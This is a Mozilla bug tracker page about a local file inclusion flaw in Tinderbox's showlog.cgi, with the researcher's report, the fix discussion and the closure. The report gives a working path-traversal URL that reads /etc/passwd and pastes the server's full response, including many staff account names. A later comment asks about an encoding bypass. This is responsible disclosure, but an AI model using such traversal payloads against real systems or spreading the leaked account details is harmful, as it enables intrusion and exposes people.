Closed Bug 823923 Opened 7 years ago Closed 7 years ago

local file inclusion vulnerability in Tinderbox

Categories

(Webtools Graveyard :: Tinderbox, defect)

defect
Not set

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: curtisk, Assigned: aki)

References

Details

Hello,

my name is Fabián Cuchietti, i'm a security researcher... In this research i have found  "Local File Inclusion (LFI)".
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page.
 this issue by reading some files from the target web server. (IS BUG BOUNTY?)
Url 	http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation cg-bugs01&fulltext=1
Parameter Name 	logfile
Parameter Type 	Querystring
Attack Pattern 	../../../../../../../../../../../etc/passwd
Response:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
nagios:x:101:102:nagios:/var/log/nagios:/bin/sh
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
bonsai:x:522:105::/home/bonsai:/bin/bash
tinderbox:x:521:104::/home/tinderbox:/bin/bash
varnish:x:103:107:Varnish http accelerator user:/var/lib/varnish:/sbin/nologin
nginx:x:104:108:Nginx user:/var/lib/nginx:/bin/false
hpsmh:x:400:400::/opt/hp/hpsmh:/sbin/nologin
_lldpd:x:105:109:LLDP daemon:/var/run/lldpd:/bin/false
infrasec:x:2324:2324::/home/infrasec:/bin/bash
dmoore:x:599:599::/home/dmoore:/bin/bash
bhourigan:x:1734:1734::/home/bhourigan:/bin/bash
arr:x:1556:1556::/home/arr:/bin/tcsh
rtucker:x:1509:1509::/home/rtucker:/bin/bash
rpina:x:1396:1396::/home/rpina:/bin/bash
mburns:x:1726:1726::/home/mburns:/bin/bash
justdave:x:504:504::/home/justdave:/bin/bash
mrz:x:506:506::/home/mrz:/bin/tcsh
gdestuynder:x:1663:1663::/home/gdestuynder:/bin/bash
shyam:x:1137:1137::/home/shyam:/bin/bash
jvier:x:1449:1449::/home/jvier:/bin/bash
jthomas:x:1700:1700::/home/jthomas:/bin/bash
jcrowe:x:1735:1735::/home/jcrowe:/bin/bash
mlarrain:x:1647:1647::/home/mlarrain:/bin/bash
rbryce:x:1736:1736::/home/rbryce:/bin/bash
pchiasson:x:1645:1645::/home/pchiasson:/bin/bash
tmary:x:1592:1592::/home/tmary:/bin/bash
dmitchell:x:1458:1458::/home/dmitchell:/bin/bash
ghuerta:x:1524:1524::/home/ghuerta:/bin/bash
oremj:x:505:505::/home/oremj:/bin/bash
mpressman:x:1595:1595::/home/mpressman:/bin/bash
nmaul:x:1549:1549::/home/nmaul:/bin/bash
mcoates:x:1306:1306::/home/mcoates:/bin/bash
scabral:x:1808:1808::/home/scabral:/bin/bash
ashish:x:1579:1579::/home/ashish:/bin/bash
amilewski:x:1177:1177::/home/amilewski:/bin/bash
eparker:x:1797:1797::/home/eparker:/bin/bash
ckolos:x:1732:1732::/home/ckolos:/bin/bash
jdow:x:1299:1299::/home/jdow:/bin/bash
cshields:x:1047:1047::/home/cshields:/bin/bash
dgherman:x:1562:1562::/home/dgherman:/bin/bash
jstevensen:x:1679:1679::/home/jstevensen:/bin/bash
jlazaro:x:1303:1303::/home/jlazaro:/bin/bash
rsoderberg:x:1432:1432::/home/rsoderberg:/bin/bash
petef:x:1519:1519::/home/petef:/bin/bash
jwatkins:x:1787:1787::/home/jwatkins:/bin/bash
cliang:x:1795:1795::/home/cliang:/bin/bash
ahill2:x:1541:1541::/home/ahill2:/bin/bash
rmilewski:x:1427:1427::/home/rmilewski:/bin/bash
dparsons:x:1724:1724::/home/dparsons:/bin/bash
bkero:x:1369:1369::/home/bkero:/bin/bash
rhelmer:x:1476:1476::/home/rhelmer:/bin/bash
lthomson:x:5506:5506::/home/lthomson:/bin/bash
afernandez:x:1905:1905::/home/afernandez:/bin/bash
cransom:x:1835:1835::/home/cransom:/bin/bash
jhayashi:x:1848:1848::/home/jhayashi:/bin/bash
bobm:x:1925:1925::/home/bobm:/bin/bash
mmayo:x:1788:1788::/home/mmayo:/bin/bash
bburton:x:1868:1868::/home/bburton:/bin/bash
cturra:x:1909:1909::/home/cturra:/bin/bash
dmaher:x:1924:1924::/home/dmaher:/bin/bash
amckay:x:1217:1217::/home/amckay:/bin/bash
eziegenhorn:x:1892:1892::/home/eziegenhorn:/bin/bash
ayounsi:x:1155:1155::/home/ayounsi:/bin/bash
mhenry:x:1927:1927::/home/mhenry:/bin/bash
juber:x:1959:1959::/home/juber:/bin/bash
ossec:x:401:401::/var/ossec:/sbin/nologin
ossecm:x:402:401::/var/ossec:/sbin/nologin
ossecr:x:403:401::/var/ossec:/sbin/nologin


Best regards,
Fabián Cuchietti.
Flags: sec-bounty?
showlog.cgi file located here

https://mxr.mozilla.org/mozilla/source/webtools/tinderbox/showlog.cgi


Someone else will have to audit the code since I'm not that good at perl.
Depends on: 824020
You still have not corrected the vulnerability.?
reed: Who is the appropriate assignee for this bug?
Flags: needinfo?(reed)
I'll take it.
Assignee: nobody → reed
Flags: needinfo?(reed)
Blocks: 835471
If we're not going to fix it can we just shut tinderbox down? What hasn't migrated to tbpl?
Flags: sec-bounty? → sec-bounty+
Depends on: 842742
http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, root@localhost and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.
Apache Server at tinderbox.mozilla.org Port 80
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → FIXED
(In reply to Michael Henry [:tinfoil] from comment #7)
> http://tinderbox.mozilla.org/showlog.
> cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../
> etc/passwd&buildtime=1356022860&buildname=documentation

Where's the patch that fixed this? Apparently, it was done in bug 842742, which I can't see. Why was a separate bug filed? Work should have been done in this bug. We don't do separate super-hidden bugs for normal security fixes, so why in the world would we do the same here?

The fix, which while it may work, is definitely not the best way to do this:

http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&root=/cvsroot&subdir=mozilla/webtools/tinderbox&command=DIFF_FRAMESET&root=/cvsroot&file=showlog.cgi&rev1=1.35&rev2=1.36

Has anybody tried using hex codes for '.' and seeing if it still works (or some other form of obfuscation of the '.')?
Assignee: reed → aki
If you mean .. , f/e, that doesn't work.
Group: webtools-security
Depends on: tinderbox-death
Product: Webtools → Webtools Graveyard
You need to log in before you can comment on or make changes to this bug.